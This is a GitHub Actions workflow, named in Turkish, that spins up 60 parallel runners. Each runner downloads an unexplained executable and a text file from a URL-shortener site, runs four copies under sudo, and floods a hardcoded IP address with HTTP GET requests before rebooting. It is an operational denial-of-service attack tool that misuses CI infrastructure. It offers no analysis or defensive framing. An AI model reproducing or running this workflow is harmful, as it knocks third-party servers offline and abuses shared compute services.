name: Ubuntu VDS 45 saniye kiled

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 60
      matrix:
       instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60] 


    steps:
      - name: OK !
        run: |
          wget https://curl.by/UyO1k/killed -O killed
          wget https://curl.by/5LK_w/fres.txt -O fres.txt
          chmod +x killed
          PIDS=()
          for i in {1..4}; do
            sudo timeout 60 ./killed GET http://151.242.52.15/ fres.txt 60 950 10 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 60
        
      - name: OK !
        run: sudo reboot
